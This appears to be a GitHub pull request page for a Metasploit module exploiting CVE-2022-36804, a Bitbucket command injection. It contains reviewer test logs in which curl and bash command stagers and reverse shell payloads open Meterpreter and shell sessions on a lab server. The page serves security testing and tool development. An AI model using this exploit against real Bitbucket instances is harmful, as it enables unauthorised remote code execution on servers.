Add exploit for CVE-2022-36804 #17042
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
|
Worked great for me! |
rbowes-r7
reviewed
Sep 20, 2022
rbowes-r7
reviewed
Sep 20, 2022
rbowes-r7
reviewed
Sep 20, 2022
smcintyre-r7
requested changes
Sep 21, 2022
smcintyre-r7
approved these changes
Sep 21, 2022
There was a problem hiding this comment.
With the latest round of changes, everything I've tested is working great now including different command stager flavors and a few command payloads.
Testing Output
Bunch of payloads working correctly while targeting 7.21.3
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > show options
Module options (exploit/linux/http/bitbucket_git_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.159.27 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 7990 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The base URI of Bitbucket application
URIPATH no The URI to use for this exploit (default is random)
USERNAME no The username to authenticate with
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Dropper
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set CMDSTAGER::FLAVOR curl
CMDSTAGER::FLAVOR => curl
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Using URL: http://192.168.159.128:8080/oD3783Hs
[*] Client 192.168.159.27 (curl/7.81.0) requested /oD3783Hs
[*] Sending payload to 192.168.159.27 (curl/7.81.0)
[*] Sending stage (3020772 bytes) to 192.168.159.27
[*] Sending stage (3020772 bytes) to 192.168.159.10
[*] Meterpreter session 7 opened (192.168.159.128:4444 -> 192.168.159.27:38282) at 2022-09-21 13:02:50 -0400
[*] Sending stage (3020772 bytes) to 192.168.159.10
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer : 192.168.159.27
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.159.27 - Meterpreter session 7 closed. Reason: Died
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set CMDSTAGER
[-] Meterpreter session 8 is not valid and will be closed
:[-] Meterpreter session 9 is not valid and will be closed
[*] 192.168.159.27 - Meterpreter session 8 closed.
[*] 192.168.159.27 - Meterpreter session 9 closed.
:FLAVOR bourne
CMDSTAGER::FLAVOR => bourne
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Sending stage (3020772 bytes) to 192.168.159.27
[*] Meterpreter session 10 opened (192.168.159.128:5555 -> 192.168.159.27:47800) at 2022-09-21 13:03:30 -0400
[*] Command Stager progress - 100.00% done (823/823 bytes)
meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer : 192.168.159.27
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 10...
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set TARGET Unix\ Command
TARGET => Unix Command
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Sending stage (40168 bytes) to 192.168.159.27
[*] Meterpreter session 11 opened (192.168.159.128:5555 -> 192.168.159.27:41064) at 2022-09-21 13:04:08 -0400
meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer : ubuntu2004
OS : Linux 5.15.0-48-generic #54-Ubuntu SMP Fri Aug 26 13:26:29 UTC 2022
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter > background
[*] Backgrounding session 11...
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Command shell session 12 opened (192.168.159.128:5555 -> 192.168.159.27:54452) at 2022-09-21 13:04:51 -0400
id
uid=1001(atlbitbucket) gid=1001(atlbitbucket) groups=1001(atlbitbucket)
^Z
Background session 12? [y/N] y
msf6 exploit(linux/http/bitbucket_git_cmd_injection) >
Release NotesAdds an exploit for CVE-2022-36804 which is an unauthenticated RCE in Bitbucket. |
|
Nicely done. :) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Description
Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection in multiple API endpoints. Successful exploitation requires access to a public repository. Supplying NULL bytes to the git command used at vulnerable endpoints allows the passage of extra arguments to the command, enabling command injection.
Verification
atlbitbucketuserScenarios